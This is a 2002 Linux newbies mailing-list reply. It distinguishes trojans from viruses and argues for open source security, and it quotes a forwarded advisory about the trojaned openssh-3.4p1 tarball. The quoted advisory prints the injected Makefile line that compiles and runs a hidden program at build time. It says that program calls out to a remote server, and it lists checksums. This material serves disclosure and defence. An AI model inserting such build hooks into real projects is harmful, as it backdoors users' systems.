Loading ...
Sorry, an error occurred while loading the content.

11863Re: [LINUX_Newbies] openssh-3.4p1.tar.gz distribution recently trojaned

Expand Messages
  • Horror Vacui
    Aug 1, 2002
    • 0 Attachment
      Mohsin Khan wrote:

      >I thought that Linux had no viruses?
      >

      Yes, you thought so and have all the right in the world to continue
      doing it. A trojan is not a virus. Viruses are snippets of programming
      code that can perform tasks like deleting or infecting files, formatting
      disks, sending mail, perhaps most importantly spread themselves... A
      trojan is just malicious code in a program that gathers informations
      it's programmed to gather, and send it to somebody. It's a way for
      crackers to sneak into your system and get access to informations they
      can't get from the outside. This one appears to be quite serious,
      because you often use ssh as root - therefore the trojan can access and
      betray any information root has access to, and that means quite anything.

      Nobody ever said that Open Source is impossible to crack. People will
      always try, and some will succeed. The difference between Open Source
      and proprietary software though, the significant difference that makes
      Open Source more secure, is the way such things are handled. Right at
      the moment, any peace of Open Source software you're using is being
      hacked by hundreds of friendly geeks trying to make it better for you,
      and if some unfriendly geek puts something into it to damage you, the
      friendly ones are very likely to notice right away, and being friendly,
      they invariably yell "FIRE" the moment they smell the smoke even if
      they're ashamed because of it. Proprietary software is controlled by
      much less people, some of them on starving wages, much less enthusiastic
      and much less likely to find a vulnerability. When they do, the company
      they work for is very unlikely to say "We've sold you malicious code,
      have a patch right away" - it's bad for the business. Hence the
      institution of Microsoft Service Packs, mending the worse failings and
      covering up others without you being informed explicitly what it does
      (naming the flaw). They sell it off as a service to make customers'
      software better, instead of admitting they made a mistake and are just
      correcting it.

      My thanks to friendly geeks for the software, and for having the
      greatness to admit it when they mess up. Never mind, shit happens.


      Cheers
      Horror Vacui

      >
      >
      >
      >
      >>-----Original Message-----
      >>From: Godwin Stewart [mailto:gstewart@...]
      >>Sent: Thursday, August 01, 2002 2:41 PM
      >>To: Beginning With Linux; Linux list; Linux Newbies; Linux-Anyway
      >>Subject: [LINUX_Newbies] openssh-3.4p1.tar.gz distribution recently
      >>trojaned
      >>
      >>X-POSTED to:
      >>
      >>BeginningWithLinux@yahoogroups.com
      >>linux@yahoogroups.com
      >>LINUX_Newbies@yahoogroups.com
      >>Linux-Anyway@...
      >>
      >>
      >>
      >>From
      >>http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-
      >>security
      >>
      >>----- Forwarded message from Edwin Groothuis <edwin@...> -----
      >>
      >>Date: Thu, 1 Aug 2002 16:55:51 +1000
      >>From: Edwin Groothuis <edwin@...>
      >>To: incidents@...
      >>Subject: openssh-3.4p1.tar.gz trojaned
      >>
      >>Greetings,
      >>
      >>Just want to inform you that the OpenSSH package op ftp.openbsd.org
      >>(and probably all its mirrors now) it trojaned:
      >>
      >> ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-
      >>3.4p1.tar.gz
      >>
      >>The OpenBSD people have been informed about it (via email to
      >>deraadt@... and via irc.openprojects.org/#openbsd)
      >>
      >>
      >>The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
      >> all: libopenbsd-compat.a
      >>+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
      >>../bf-test.out &
      >>
      >>bf-test.c[1] is nothing more than a wrapper which generates a
      >>shell-script[2] which compiles itself and tries to connect to an
      >>server running on 203.62.158.32:6667 (web.snsonline.net).
      >>
      >>[1] http://www.mavetju.org/~edwin/bf-test.c
      >>[2] http://www.mavetju.org/~edwin/bf-output.sh
      >>
      >>This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
      >>ports system:
      >> MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
      >>
      >>This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
      >> MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
      >>
      >>--
      >>Seen in the classified ads:
      >>NICE PARACHUTE: NEVER OPENED - USED ONCE
      >> ____________________________________________
      >>| G. Stewart -- gstewart@... |
      >>| gstewart@... |
      >>|--------------------------------------------|
      >>| Linux User Group de Touraine |
      >>| http://www.lug-touraine.org |
      >> ____________________________________________
      >>
      >>------------------------ Yahoo! Groups Sponsor
      >>
      >>To unsubscribe from this list, please email LINUX_Newbies-
      >>unsubscribe@yahoogroups.com & you will be removed.
      >>
      >>Your use of Yahoo! Groups is subject to
      >>
      >>
      >http://docs.yahoo.com/info/terms/
      >
      >
      >
      >
      >
      >
      >
      >To unsubscribe from this list, please email LINUX_Newbies-unsubscribe@yahoogroups.com & you will be removed.
      >
      >Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/
      >
      >
      >
      >
      >
      >
    • Show all 5 messages in this topic